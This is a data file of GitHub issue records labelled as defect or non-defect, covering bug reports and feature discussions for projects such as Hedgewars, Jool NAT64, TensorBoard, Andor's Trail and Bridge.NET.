Please provide any additional information below.
```
Original issue reported on code.google.com by `adibiaz...@gmail.com` on 27 Aug 2010 at 12:57
Attachments:
* [Schowek01.bmp](https://storage.googleapis.com/google-code-attachments/hedgewars/issue-18/comment-0/Schowek01.bmp)
|
defect
|
hedgehog gets trapped inside the explosive what steps will reproduce the problem set number of explosives to max and run hedgewars find out if there are three explosives on one level and if there is a hedgehog between them shoot the barrel in the middle what is the expected output what do you see instead sometimes the hedgehog doesn t bounce of the explosive but he gets inside it you can t move him out of the explosive i haven t tried to fire a weapon in this state what version of the product are you using on what operating system on windows xp sp please provide any additional information below original issue reported on code google com by adibiaz gmail com on aug at attachments
| 1
|
26,392
| 4,691,315,236
|
IssuesEvent
|
2016-10-11 10:03:57
|
gbif/ipt
|
https://api.github.com/repos/gbif/ipt
|
closed
|
Minor issue: Link to github IPT user manual would be nice, especially for new users of the IPT
|
bug Component-UI Priority-Critical Type-Defect
|
Change the old link at bottom of IPT UI (http://code.google.com/p/gbif-providertoolkit/wiki/IPT2ManualNotes) to the valid one https://github.com/gbif/ipt/wiki
|
1.0
|
Minor issue: Link to github IPT user manual would be nice, especially for new users of the IPT - Change the old link at bottom of IPT UI (http://code.google.com/p/gbif-providertoolkit/wiki/IPT2ManualNotes) to the valid one https://github.com/gbif/ipt/wiki
|
defect
|
minor issue link to github ipt user manual would be nice especially for new users of the ipt change the old link at bottom of ipt ui to the valid one
| 1
|
53,783
| 11,138,499,359
|
IssuesEvent
|
2019-12-20 22:37:12
|
NICMx/Jool
|
https://api.github.com/repos/NICMx/Jool
|
closed
|
Jool crashes when used inside a VM (Jool 4.0.0)
|
Bug: Non-critical Status: Coded
|
Hello,
Jool works well on a physical device but I can't make it work inside a VM, it crashes.
In both cases, I use Jool 4.0.0 with Ubuntu 18.04 4.15.0-45-generic
In both cases also I configure An IPv4 (let's say X.X.X.X), an IPv6 (Y::1/64 for example) for the NAT64 and one /24 IPv4 pool (let's say Y.Y.Y.0/24 here)
The command used are the following:
`$ sudo /sbin/modprobe jool`
`$ sudo jool instance add UCL --iptables --pool6 64:ff9b::/96`
`$ sudo jool -i UCL pool4 add --tcp Y.Y.Y.0/24 10000-14000`
`$ sudo jool -i UCL pool4 add --udp Y.Y.Y.0/24 10000-14000`
`$ sudo jool -i UCL pool4 add --icmp Y.Y.Y.0/24 10000-14000`
`$ sudo ip6tables -t mangle -A PREROUTING --destination 64:ff9b::/96 -j JOOL --instance UCL`
`$ sudo iptables -t mangle -A PREROUTING --destination Y.Y.Y.0/24 -p tcp --dport 10000:14000 -j JOOL --instance UCL`
`$ sudo iptables -t mangle -A PREROUTING --destination Y.Y.Y.0/24 -p udp --dport 10000:14000 -j JOOL --instance UCL`
`$ sudo iptables -t mangle -A PREROUTING --destination Y.Y.Y.0/24 -p icmp -j JOOL --instance UCL`
All command are accepted in both cases, but in the case of the VM, the whole VM crashes as soon as the NAT64 receives its first client to serve (for instance when I ping 64:ff9b::1 from a client device).
The debug messages inside Jool does not show anything special as the VM stops roughly.
From the hypervisor, I can find some error messages related to this specific VM like
"BUG: unable to handle kernel NULL pointer dereference"
"Kernel panic - not syncing: Fatal exception in interrupt"
"Unexpected reschedule of offline CPU#0"
You can find the full logs here : [https://www.dropbox.com/s/ybj4d9arrklq04c/log.txt?dl=1](url)
Thank you for your help
Rémi Floriot
|
1.0
|
Jool crashes when used inside a VM (Jool 4.0.0) - Hello,
Jool works well on a physical device but I can't make it work inside a VM, it crashes.
In both cases, I use Jool 4.0.0 with Ubuntu 18.04 4.15.0-45-generic
In both cases also I configure An IPv4 (let's say X.X.X.X), an IPv6 (Y::1/64 for example) for the NAT64 and one /24 IPv4 pool (let's say Y.Y.Y.0/24 here)
The command used are the following:
`$ sudo /sbin/modprobe jool`
`$ sudo jool instance add UCL --iptables --pool6 64:ff9b::/96`
`$ sudo jool -i UCL pool4 add --tcp Y.Y.Y.0/24 10000-14000`
`$ sudo jool -i UCL pool4 add --udp Y.Y.Y.0/24 10000-14000`
`$ sudo jool -i UCL pool4 add --icmp Y.Y.Y.0/24 10000-14000`
`$ sudo ip6tables -t mangle -A PREROUTING --destination 64:ff9b::/96 -j JOOL --instance UCL`
`$ sudo iptables -t mangle -A PREROUTING --destination Y.Y.Y.0/24 -p tcp --dport 10000:14000 -j JOOL --instance UCL`
`$ sudo iptables -t mangle -A PREROUTING --destination Y.Y.Y.0/24 -p udp --dport 10000:14000 -j JOOL --instance UCL`
`$ sudo iptables -t mangle -A PREROUTING --destination Y.Y.Y.0/24 -p icmp -j JOOL --instance UCL`
All command are accepted in both cases, but in the case of the VM, the whole VM crashes as soon as the NAT64 receives its first client to serve (for instance when I ping 64:ff9b::1 from a client device).
The debug messages inside Jool does not show anything special as the VM stops roughly.
From the hypervisor, I can find some error messages related to this specific VM like
"BUG: unable to handle kernel NULL pointer dereference"
"Kernel panic - not syncing: Fatal exception in interrupt"
"Unexpected reschedule of offline CPU#0"
You can find the full logs here : [https://www.dropbox.com/s/ybj4d9arrklq04c/log.txt?dl=1](url)
Thank you for your help
Rémi Floriot
|
non_defect
|
jool crashes when used inside a vm jool hello jool works well on a physical device but i can t make it work inside a vm it crashes in both cases i use jool with ubuntu generic in both cases also i configure an let s say x x x x an y for example for the and one pool let s say y y y here the command used are the following sudo sbin modprobe jool sudo jool instance add ucl iptables sudo jool i ucl add tcp y y y sudo jool i ucl add udp y y y sudo jool i ucl add icmp y y y sudo t mangle a prerouting destination j jool instance ucl sudo iptables t mangle a prerouting destination y y y p tcp dport j jool instance ucl sudo iptables t mangle a prerouting destination y y y p udp dport j jool instance ucl sudo iptables t mangle a prerouting destination y y y p icmp j jool instance ucl all command are accepted in both cases but in the case of the vm the whole vm crashes as soon as the receives its first client to serve for instance when i ping from a client device the debug messages inside jool does not show anything special as the vm stops roughly from the hypervisor i can find some error messages related to this specific vm like bug unable to handle kernel null pointer dereference kernel panic not syncing fatal exception in interrupt unexpected reschedule of offline cpu you can find the full logs here url thank you for your help rémi floriot
| 0
|
197,478
| 14,927,084,494
|
IssuesEvent
|
2021-01-24 14:09:37
|
SAA-SDT/eac-cpf-schema
|
https://api.github.com/repos/SAA-SDT/eac-cpf-schema
|
closed
|
@mark
|
Attribute EAD3 Reconciliation Tested by Schema Team
|
## Mark
After a discussion around `<list>` #171 , it was decided to use `@style` #242 to encode the character to be used in marking each list entry in an undorded list. Hence `@mark` won't be introduced in EAC-CPF.
--- obsolete ---
Add optional attribute `@mark` with closed lists of predefined values to `<list>`.
Availability: optional
Values: disc, circle, inherit, none, square
May occur within: `<list>`
--- obsolete ---
## Creator of issue
1. Silke Jagodzinski
2. TS-EAS: EAC-CPF subgroup
3. silkejagodzinski@gmail.com
## Related issues / documents
[20200128_SharedSchemaOverview](https://docs.google.com/document/d/1o9mtdzEzNTize7EGvEfKCsFR4ZY_OCVIXZdLDzOJnrY/edit)
## EAD3 Reconciliation
Decision from EAC-EAD-Schema joint meeting, 28 Jan 2020, due to alignment of in both standards.
**Summary:**
For lists with a listtype value "unordered," mark may be used to indicate the character to be used in marking each list entry. Values are drawn from the CSS "list-style-type" property list.
**Values:** disc, circle, inherit, none, square
## Context
EAD3 specific attribute.
## Solution documentation
**Summary:** For lists with a listtype value "unordered", mark may be used to indicate the character to be used in marking each list entry. Values are drawn from the CSS "list-style-type" property list.
**Values:** disc, circle, inherit, none, square
**May occur within**: `<list>`
## Encoding example
```
<generalContext>
<list listType="unordered" mark="circle">
<item>list item, unordered with circle</item>
<item>list item, unorded with circle</item>
</list>
</generalContext>
```
|
1.0
|
@mark - ## Mark
After a discussion around `<list>` #171 , it was decided to use `@style` #242 to encode the character to be used in marking each list entry in an undorded list. Hence `@mark` won't be introduced in EAC-CPF.
--- obsolete ---
Add optional attribute `@mark` with closed lists of predefined values to `<list>`.
Availability: optional
Values: disc, circle, inherit, none, square
May occur within: `<list>`
--- obsolete ---
## Creator of issue
1. Silke Jagodzinski
2. TS-EAS: EAC-CPF subgroup
3. silkejagodzinski@gmail.com
## Related issues / documents
[20200128_SharedSchemaOverview](https://docs.google.com/document/d/1o9mtdzEzNTize7EGvEfKCsFR4ZY_OCVIXZdLDzOJnrY/edit)
## EAD3 Reconciliation
Decision from EAC-EAD-Schema joint meeting, 28 Jan 2020, due to alignment of in both standards.
**Summary:**
For lists with a listtype value "unordered," mark may be used to indicate the character to be used in marking each list entry. Values are drawn from the CSS "list-style-type" property list.
**Values:** disc, circle, inherit, none, square
## Context
EAD3 specific attribute.
## Solution documentation
**Summary:** For lists with a listtype value "unordered", mark may be used to indicate the character to be used in marking each list entry. Values are drawn from the CSS "list-style-type" property list.
**Values:** disc, circle, inherit, none, square
**May occur within**: `<list>`
## Encoding example
```
<generalContext>
<list listType="unordered" mark="circle">
<item>list item, unordered with circle</item>
<item>list item, unorded with circle</item>
</list>
</generalContext>
```
|
non_defect
|
mark mark after a discussion around it was decided to use style to encode the character to be used in marking each list entry in an undorded list hence mark won t be introduced in eac cpf obsolete add optional attribute mark with closed lists of predefined values to availability optional values disc circle inherit none square may occur within obsolete creator of issue silke jagodzinski ts eas eac cpf subgroup silkejagodzinski gmail com related issues documents reconciliation decision from eac ead schema joint meeting jan due to alignment of in both standards summary for lists with a listtype value unordered mark may be used to indicate the character to be used in marking each list entry values are drawn from the css list style type property list values disc circle inherit none square context specific attribute solution documentation summary for lists with a listtype value unordered mark may be used to indicate the character to be used in marking each list entry values are drawn from the css list style type property list values disc circle inherit none square may occur within encoding example list item unordered with circle list item unorded with circle
| 0
|
24,531
| 4,006,426,169
|
IssuesEvent
|
2016-05-12 14:53:48
|
google/google-api-dotnet-client
|
https://api.github.com/repos/google/google-api-dotnet-client
|
closed
|
youtubeService.Videos.Insert() hides exceptions
|
auto-migrated Priority-Medium Type-Defect
|
```
What steps will reproduce the problem?
1. call youtubeService.Videos.Insert() expecting an HTTP 401
2. Check the result of the Insert() call's IUploadProgress.Exception property
Expected result
A reference to an exception related to (and with a message pertaining to) the
HTTP 401 error
Actual result
System.ArgumentNullException: Value cannot be null.
Parameter name: baseUri
at Microsoft.Runtime.CompilerServices.TaskAwaiter.ThrowForNonSuccess(Task task)
at Microsoft.Runtime.CompilerServices.TaskAwaiter.HandleNonSuccess(Task task)
at Microsoft.Runtime.CompilerServices.ConfiguredTaskAwaitable`1.ConfiguredTaskAwaiter.GetResult()
at Google.Apis.Upload.ResumableUpload`1.<UploadCoreAsync>d__e.MoveNext() in
What version of the product are you using?
1.8.1
What is your operating system?
Windows 7
What is your IDE?
VS 2010
What is the .NET framework version?
4
Please provide any additional information below.
Youtube is making me angry by requiring a google plus account.
```
Original issue reported on code.google.com by `TERMINAT...@ogilvy.com` on 8 Apr 2014 at 4:55
|
1.0
|
youtubeService.Videos.Insert() hides exceptions - ```
What steps will reproduce the problem?
1. call youtubeService.Videos.Insert() expecting an HTTP 401
2. Check the result of the Insert() call's IUploadProgress.Exception property
Expected result
A reference to an exception related to (and with a message pertaining to) the
HTTP 401 error
Actual result
System.ArgumentNullException: Value cannot be null.
Parameter name: baseUri
at Microsoft.Runtime.CompilerServices.TaskAwaiter.ThrowForNonSuccess(Task task)
at Microsoft.Runtime.CompilerServices.TaskAwaiter.HandleNonSuccess(Task task)
at Microsoft.Runtime.CompilerServices.ConfiguredTaskAwaitable`1.ConfiguredTaskAwaiter.GetResult()
at Google.Apis.Upload.ResumableUpload`1.<UploadCoreAsync>d__e.MoveNext() in
What version of the product are you using?
1.8.1
What is your operating system?
Windows 7
What is your IDE?
VS 2010
What is the .NET framework version?
4
Please provide any additional information below.
Youtube is making me angry by requiring a google plus account.
```
Original issue reported on code.google.com by `TERMINAT...@ogilvy.com` on 8 Apr 2014 at 4:55
|
defect
|
youtubeservice videos insert hides exceptions what steps will reproduce the problem call youtubeservice videos insert expecting an http check the result of the insert call s iuploadprogress exception property expected result a reference to an exception related to and with a message pertaining to the http error actual result system argumentnullexception value cannot be null parameter name baseuri at microsoft runtime compilerservices taskawaiter throwfornonsuccess task task at microsoft runtime compilerservices taskawaiter handlenonsuccess task task at microsoft runtime compilerservices configuredtaskawaitable configuredtaskawaiter getresult at google apis upload resumableupload d e movenext in what version of the product are you using what is your operating system windows what is your ide vs what is the net framework version please provide any additional information below youtube is making me angry by requiring a google plus account original issue reported on code google com by terminat ogilvy com on apr at
| 1
|
290,727
| 21,897,417,492
|
IssuesEvent
|
2022-05-20 09:58:37
|
bounswe/bounswe2022group1
|
https://api.github.com/repos/bounswe/bounswe2022group1
|
closed
|
Weekly meeting notes #9
|
Type: Documentation
|
I should upload the meeting notes of the meeting on 19.05.2022 for the Milestone report 2
|
1.0
|
Weekly meeting notes #9 - I should upload the meeting notes of the meeting on 19.05.2022 for the Milestone report 2
|
non_defect
|
weekly meeting notes i should upload the meeting notes of the meeting on for the milestone report
| 0
|
53,616
| 13,261,977,760
|
IssuesEvent
|
2020-08-20 20:52:55
|
icecube-trac/tix4
|
https://api.github.com/repos/icecube-trac/tix4
|
closed
|
Software documentation links almost all lead to 403 - Forbidden (Trac #1758)
|
Migrated from Trac defect other
|
http://software.icecube.wisc.edu/documentation
Almost all links I've tried from "Project Details" heading and below go to
403 - Forbidden
clsim and children work, though, as well as links above "Project Details." I suspect this is because I visited these pages and my web browser cached them; trying from a browser from a server, all documentation links (including the documentation link itself) return 403 errors.
<details>
<summary><em>Migrated from <a href="https://code.icecube.wisc.edu/projects/icecube/ticket/1758">https://code.icecube.wisc.edu/projects/icecube/ticket/1758</a>, reported by jlanfranchi</summary>
<p>
```json
{
"status": "closed",
"changetime": "2016-06-23T07:37:44",
"_ts": "1466667464194375",
"description": "http://software.icecube.wisc.edu/documentation\n\nAlmost all links I've tried from \"Project Details\" heading and below go to\n403 - Forbidden\nclsim and children work, though, as well as links above \"Project Details.\" I suspect this is because I visited these pages and my web browser cached them; trying from a browser from a server, all documentation links (including the documentation link itself) return 403 errors.",
"reporter": "jlanfranchi",
"cc": "",
"resolution": "invalid",
"time": "2016-06-23T04:42:28",
"component": "other",
"summary": "Software documentation links almost all lead to 403 - Forbidden",
"priority": "normal",
"keywords": "",
"milestone": "",
"owner": "",
"type": "defect"
}
```
</p>
</details>
|
1.0
|
Software documentation links almost all lead to 403 - Forbidden (Trac #1758) - http://software.icecube.wisc.edu/documentation
Almost all links I've tried from "Project Details" heading and below go to
403 - Forbidden
clsim and children work, though, as well as links above "Project Details." I suspect this is because I visited these pages and my web browser cached them; trying from a browser from a server, all documentation links (including the documentation link itself) return 403 errors.
<details>
<summary><em>Migrated from <a href="https://code.icecube.wisc.edu/projects/icecube/ticket/1758">https://code.icecube.wisc.edu/projects/icecube/ticket/1758</a>, reported by jlanfranchi</summary>
<p>
```json
{
"status": "closed",
"changetime": "2016-06-23T07:37:44",
"_ts": "1466667464194375",
"description": "http://software.icecube.wisc.edu/documentation\n\nAlmost all links I've tried from \"Project Details\" heading and below go to\n403 - Forbidden\nclsim and children work, though, as well as links above \"Project Details.\" I suspect this is because I visited these pages and my web browser cached them; trying from a browser from a server, all documentation links (including the documentation link itself) return 403 errors.",
"reporter": "jlanfranchi",
"cc": "",
"resolution": "invalid",
"time": "2016-06-23T04:42:28",
"component": "other",
"summary": "Software documentation links almost all lead to 403 - Forbidden",
"priority": "normal",
"keywords": "",
"milestone": "",
"owner": "",
"type": "defect"
}
```
</p>
</details>
|
defect
|
software documentation links almost all lead to forbidden trac almost all links i ve tried from project details heading and below go to forbidden clsim and children work though as well as links above project details i suspect this is because i visited these pages and my web browser cached them trying from a browser from a server all documentation links including the documentation link itself return errors migrated from json status closed changetime ts description all links i ve tried from project details heading and below go to forbidden nclsim and children work though as well as links above project details i suspect this is because i visited these pages and my web browser cached them trying from a browser from a server all documentation links including the documentation link itself return errors reporter jlanfranchi cc resolution invalid time component other summary software documentation links almost all lead to forbidden priority normal keywords milestone owner type defect
| 1
|
7,857
| 2,611,053,511
|
IssuesEvent
|
2015-02-27 00:24:40
|
alistairreilly/andors-trail
|
https://api.github.com/repos/alistairreilly/andors-trail
|
opened
|
Combat is uninteresting
|
auto-migrated Priority-Medium Type-Defect
|
```
Some of the changes in 0.6.7a have highlighted this issue for me. Basicly, you
look at your health, either heal or attack, then repeat. There is very little
to it beyond that.
I understand some of the comments here may be because we only have the start of
the game and so a basic selection of enemies, items and quests, but I would
make them unnecessarily than not.
I've noticed this particularly with the recent changes. I have everything set
to the fastest options, no confirm attack, auto pickup loot, instant combat
speed. Combine this with using the trackball to move and I barely even notice
when an enemy gets in my way. Once in combat, any trackball direction counts as
a screen tap and causes an attack, allowing me to get through my attacks in
very fast, and the enemies are instant. All I have to do is keep half an eye on
my HP and heal when necessary.
This is even the case on a new game, I started one last night and once I had a
decent sword and a couple of levels (a few minutes work) it got a lot easier.
So I could just change the settings to slow everything down you say?
I could, but the underlying problem is still there. Combat doesn't require
attention and isn't challenging or varied. Having it so sped up just highlights
the issue, it doesn't cause it.
So what can be done about this?
I can think of a few possibilities. Specifically changing the combat UI to give
more focus and control to the combat, adding more variety and tactics to combat
(skills and spells as discussed elsewhere) and more variety to the enemies.
When it comes to the UI, I can think of two areas of change that would improve
things. Firstly, and not specifically related to combat, don't have any buttons
at the top of the screen. When I play I hold the device in my palm and interact
with my thumb. I can't easily reach the top of the screen without moving my
whole arm and when I do I cover the screen with my hand. I can't be the only
one who plays this way. I would suggest having the players health and xp (and
other pertinent information, mana, stamina, e.t.c.) in thin bars at the top of
the screen at all times, and keep buttons at the bottom of the screen. Maybe a
row for accessing the character screen, inventory, journal (spells, quests,
map) e.t.c. and a second row of context-specific buttons that change for
combat, wandering and any other activities that are added.
The second thing I think would improve UI is zooming in to a 5x5 area (enough
to see where to go if you need to run) around the player when they enter
combat. This would allow for more detail to be displayed in the game area
itself. Small health bars by each enemy in a group fight, with a detail section
for the selected enemy showing the specific numbers, the tiny (on my phone) red
numbers showing damage on each hit could be enlarged, and making the game area
square would give a bit more room for skill, spell and item quick access when
they are added.
Skills and spells are elsewhere, and I won't go into detail here, but I will
say that they should do more than just beef up the player. They should add
different strategies to the game, debilitation and disabling enemies
(immobilising, reducing enemy skills, slowing, making them take more ap to
attack e.t.c.), evasion/dodge (careful, almost always overpowered if skilled
exclusively), tanking (soaking up damage), berserk (damage bonus rises as hp
drops), combos, vampirism e.t.c.
Enemies need more variety, they should use different tactics, much like the
various options for the player mentioned above.
Groups of enemies that work together to provide different parts of a combo
would be excellent, requiring the player to seperate them out and kill them one
by one or risk a dangerous combo (one enemy binds a player, the next delivers a
special attack that auto crits on an immobilised target, for example). This
should be dependant on a good way to tell the player knowing what is going on,
as getting killed when you don't know what is happening is no fun.
```
Original issue reported on code.google.com by `caveman....@gmail.com` on 11 Dec 2010 at 8:04
|
1.0
|
Combat is uninteresting - ```
Some of the changes in 0.6.7a have highlighted this issue for me. Basicly, you
look at your health, either heal or attack, then repeat. There is very little
to it beyond that.
I understand some of the comments here may be because we only have the start of
the game and so a basic selection of enemies, items and quests, but I would
make them unnecessarily than not.
I've noticed this particularly with the recent changes. I have everything set
to the fastest options, no confirm attack, auto pickup loot, instant combat
speed. Combine this with using the trackball to move and I barely even notice
when an enemy gets in my way. Once in combat, any trackball direction counts as
a screen tap and causes an attack, allowing me to get through my attacks in
very fast, and the enemies are instant. All I have to do is keep half an eye on
my HP and heal when necessary.
This is even the case on a new game, I started one last night and once I had a
decent sword and a couple of levels (a few minutes work) it got a lot easier.
So I could just change the settings to slow everything down you say?
I could, but the underlying problem is still there. Combat doesn't require
attention and isn't challenging or varied. Having it so sped up just highlights
the issue, it doesn't cause it.
So what can be done about this?
I can think of a few possibilities. Specifically changing the combat UI to give
more focus and control to the combat, adding more variety and tactics to combat
(skills and spells as discussed elsewhere) and more variety to the enemies.
When it comes to the UI, I can think of two areas of change that would improve
things. Firstly, and not specifically related to combat, don't have any buttons
at the top of the screen. When I play I hold the device in my palm and interact
with my thumb. I can't easily reach the top of the screen without moving my
whole arm and when I do I cover the screen with my hand. I can't be the only
one who plays this way. I would suggest having the players health and xp (and
other pertinent information, mana, stamina, e.t.c.) in thin bars at the top of
the screen at all times, and keep buttons at the bottom of the screen. Maybe a
row for accessing the character screen, inventory, journal (spells, quests,
map) e.t.c. and a second row of context-specific buttons that change for
combat, wandering and any other activities that are added.
The second thing I think would improve UI is zooming in to a 5x5 area (enough
to see where to go if you need to run) around the player when they enter
combat. This would allow for more detail to be displayed in the game area
itself. Small health bars by each enemy in a group fight, with a detail section
for the selected enemy showing the specific numbers, the tiny (on my phone) red
numbers showing damage on each hit could be enlarged, and making the game area
square would give a bit more room for skill, spell and item quick access when
they are added.
Skills and spells are elsewhere, and I won't go into detail here, but I will
say that they should do more than just beef up the player. They should add
different strategies to the game, debilitation and disabling enemies
(immobilising, reducing enemy skills, slowing, making them take more ap to
attack e.t.c.), evasion/dodge (careful, almost always overpowered if skilled
exclusively), tanking (soaking up damage), berserk (damage bonus rises as hp
drops), combos, vampirism e.t.c.
Enemies need more variety, they should use different tactics, much like the
various options for the player mentioned above.
Groups of enemies that work together to provide different parts of a combo
would be excellent, requiring the player to seperate them out and kill them one
by one or risk a dangerous combo (one enemy binds a player, the next delivers a
special attack that auto crits on an immobilised target, for example). This
should be dependant on a good way to tell the player knowing what is going on,
as getting killed when you don't know what is happening is no fun.
```
Original issue reported on code.google.com by `caveman....@gmail.com` on 11 Dec 2010 at 8:04
|
defect
|
combat is uninteresting some of the changes in have highlighted this issue for me basicly you look at your health either heal or attack then repeat there is very little to it beyond that i understand some of the comments here may be because we only have the start of the game and so a basic selection of enemies items and quests but i would make them unnecessarily than not i ve noticed this particularly with the recent changes i have everything set to the fastest options no confirm attack auto pickup loot instant combat speed combine this with using the trackball to move and i barely even notice when an enemy gets in my way once in combat any trackball direction counts as a screen tap and causes an attack allowing me to get through my attacks in very fast and the enemies are instant all i have to do is keep half an eye on my hp and heal when necessary this is even the case on a new game i started one last night and once i had a decent sword and a couple of levels a few minutes work it got a lot easier so i could just change the settings to slow everything down you say i could but the underlying problem is still there combat doesn t require attention and isn t challenging or varied having it so sped up just highlights the issue it doesn t cause it so what can be done about this i can think of a few possibilities specifically changing the combat ui to give more focus and control to the combat adding more variety and tactics to combat skills and spells as discussed elsewhere and more variety to the enemies when it comes to the ui i can think of two areas of change that would improve things firstly and not specifically related to combat don t have any buttons at the top of the screen when i play i hold the device in my palm and interact with my thumb i can t easily reach the top of the screen without moving my whole arm and when i do i cover the screen with my hand i can t be the only one who plays this way i would suggest having the players health and xp and other pertinent information mana stamina e t c in thin bars at the top of the screen at all times and keep buttons at the bottom of the screen maybe a row for accessing the character screen inventory journal spells quests map e t c and a second row of context specific buttons that change for combat wandering and any other activities that are added the second thing i think would improve ui is zooming in to a area enough to see where to go if you need to run around the player when they enter combat this would allow for more detail to be displayed in the game area itself small health bars by each enemy in a group fight with a detail section for the selected enemy showing the specific numbers the tiny on my phone red numbers showing damage on each hit could be enlarged and making the game area square would give a bit more room for skill spell and item quick access when they are added skills and spells are elsewhere and i won t go into detail here but i will say that they should do more than just beef up the player they should add different strategies to the game debilitation and disabling enemies immobilising reducing enemy skills slowing making them take more ap to attack e t c evasion dodge careful almost always overpowered if skilled exclusively tanking soaking up damage berserk damage bonus rises as hp drops combos vampirism e t c enemies need more variety they should use different tactics much like the various options for the player mentioned above groups of enemies that work together to provide different parts of a combo would be excellent requiring the player to seperate them out and kill them one by one or risk a dangerous combo one enemy binds a player the next delivers a special attack that auto crits on an immobilised target for example this should be dependant on a good way to tell the player knowing what is going on as getting killed when you don t know what is happening is no fun original issue reported on code google com by caveman gmail com on dec at
| 1
|
255,440
| 19,302,490,558
|
IssuesEvent
|
2021-12-13 07:56:24
|
Ootzk/SsENet.PyTorch
|
https://api.github.com/repos/Ootzk/SsENet.PyTorch
|
closed
|
Reorganize Project
|
documentation organization
|
too many redundant codes (especially model structure)
change 1 model structure code and choose squeeze algorithm with argument.
|
1.0
|
Reorganize Project - too many redundant codes (especially model structure)
change 1 model structure code and choose squeeze algorithm with argument.
|
non_defect
|
reorganize project too many redundant codes especially model structure change model structure code and choose squeeze algorithm with argument
| 0
|
10,543
| 7,220,098,645
|
IssuesEvent
|
2018-02-09 00:06:31
|
tensorflow/tensorboard
|
https://api.github.com/repos/tensorflow/tensorboard
|
closed
|
[win7-64bit,Anaconda,tensorflow 1.2.0,chrome]Tensorboard : No scalar data was found
|
(╯°□°)╯windows type:bug/performance type:support
|
I can't see any data. It turned out to be : No scalar
was found
when I run the tensorboard ,there is no error or warning
Environment info
Windows 7 64-bit
Anaconda Python 3.5
Tensoflow installed from binary pip package
tensorflow version:1.2.0
Browser: Chrome 58
About the code
I just run the example code mnist_with_summries.py
it is in D:\Anaconda\Lib\site-packages\tensorflow\examples\tutorials\mnist\mnist_with_summaries.py
What have you tried?
I can see a log file called events.out.tfevents.* in the folder I set. The file is about 16Mb big.
I call tensorboard --logdir=/tmp/tensorflow/mnist/logs/mnist_with_summaries --debug and I can verify the log dir is correct.
On the browser I can't see any data or graph is shown.
If I call tensorboard --inspect --logdir=/tmp/tensorflow/mnist/logs/mnist_with_summaries It shows how the tfevent file contains.
|
True
|
[win7-64bit,Anaconda,tensorflow 1.2.0,chrome]Tensorboard : No scalar data was found - I can't see any data. It turned out to be : No scalar
was found
when I run the tensorboard ,there is no error or warning
Environment info
Windows 7 64-bit
Anaconda Python 3.5
Tensoflow installed from binary pip package
tensorflow version:1.2.0
Browser: Chrome 58
About the code
I just run the example code mnist_with_summries.py
it is in D:\Anaconda\Lib\site-packages\tensorflow\examples\tutorials\mnist\mnist_with_summaries.py
What have you tried?
I can see a log file called events.out.tfevents.* in the folder I set. The file is about 16Mb big.
I call tensorboard --logdir=/tmp/tensorflow/mnist/logs/mnist_with_summaries --debug and I can verify the log dir is correct.
On the browser I can't see any data or graph is shown.
If I call tensorboard --inspect --logdir=/tmp/tensorflow/mnist/logs/mnist_with_summaries It shows how the tfevent file contains.
|
non_defect
|
tensorboard no scalar data was found i can t see any data it turned out to be no scalar was found when i run the tensorboard there is no error or warning environment info windows bit anaconda python tensoflow installed from binary pip package tensorflow version browser chrome about the code i just run the example code mnist with summries py it is in d anaconda lib site packages tensorflow examples tutorials mnist mnist with summaries py what have you tried i can see a log file called events out tfevents in the folder i set the file is about big i call tensorboard logdir tmp tensorflow mnist logs mnist with summaries debug and i can verify the log dir is correct on the browser i can t see any data or graph is shown if i call tensorboard inspect logdir tmp tensorflow mnist logs mnist with summaries it shows how the tfevent file contains
| 0
|
414,680
| 27,998,887,830
|
IssuesEvent
|
2023-03-27 10:19:23
|
Joystream/joystream
|
https://api.github.com/repos/Joystream/joystream
|
opened
|
Ephesus: Missing CHANGELOG entries
|
documentation ephesus
|
I noticed we still have a few missing `CHANGELOG` on Ephesus branch:
- Argus: `1.1.0` (there is actually a related issue: https://github.com/Joystream/joystream/issues/4545)
- Colossus: `3.2.0`
- Query node: `1.2.0`
- Types: `2.0.0`, `2.1.0`
|
1.0
|
Ephesus: Missing CHANGELOG entries - I noticed we still have a few missing `CHANGELOG` on Ephesus branch:
- Argus: `1.1.0` (there is actually a related issue: https://github.com/Joystream/joystream/issues/4545)
- Colossus: `3.2.0`
- Query node: `1.2.0`
- Types: `2.0.0`, `2.1.0`
|
non_defect
|
ephesus missing changelog entries i noticed we still have a few missing changelog on ephesus branch argus there is actually a related issue colossus query node types
| 0
|
30,081
| 6,016,552,060
|
IssuesEvent
|
2017-06-07 07:19:09
|
bridgedotnet/Bridge
|
https://api.github.com/repos/bridgedotnet/Bridge
|
closed
|
External classes marked with [Namespace] and [IgnoreGeneric]
|
defect in progress
|
When a class marked with `[External]`, `[IgnoreGeneric]` and `[Namespace]` attributes, there should not be any adjustments to the class name.
This is a particular case of the issue #2349. Basically it was supposed that even if a custom namespace specified, the original class name will be used without arity value.
### Steps To Reproduce
https://dev.deck.net/1c7bd8456c559917900f410cdcb925da/vert
```c#
public class Program
{
public static void Main()
{
var test = new Generic<int>();
}
}
[External]
[IgnoreGeneric]
[Namespace(false)] // <-- Comment it to fix
public class Generic<T>
{
}
```
### Expected Result
```js
Bridge.assembly("Demo", function ($asm, globals) {
"use strict";
Bridge.define("Demo.Program", {
main: function Main() {
var test = new Generic();
}
});
});
```
### Actual Result
```js
Bridge.assembly("Demo", function ($asm, globals) {
"use strict";
Bridge.define("Demo.Program", {
main: function Main() {
var test = new Generic$1();
}
});
});
```
## See Also
- [#2349] Naming of external classes marked with [IngoreGeneric]
|
1.0
|
External classes marked with [Namespace] and [IgnoreGeneric] - When a class marked with `[External]`, `[IgnoreGeneric]` and `[Namespace]` attributes, there should not be any adjustments to the class name.
This is a particular case of the issue #2349. Basically it was supposed that even if a custom namespace specified, the original class name will be used without arity value.
### Steps To Reproduce
https://dev.deck.net/1c7bd8456c559917900f410cdcb925da/vert
```c#
public class Program
{
public static void Main()
{
var test = new Generic<int>();
}
}
[External]
[IgnoreGeneric]
[Namespace(false)] // <-- Comment it to fix
public class Generic<T>
{
}
```
### Expected Result
```js
Bridge.assembly("Demo", function ($asm, globals) {
"use strict";
Bridge.define("Demo.Program", {
main: function Main() {
var test = new Generic();
}
});
});
```
### Actual Result
```js
Bridge.assembly("Demo", function ($asm, globals) {
"use strict";
Bridge.define("Demo.Program", {
main: function Main() {
var test = new Generic$1();
}
});
});
```
## See Also
- [#2349] Naming of external classes marked with [IngoreGeneric]
|
defect
|
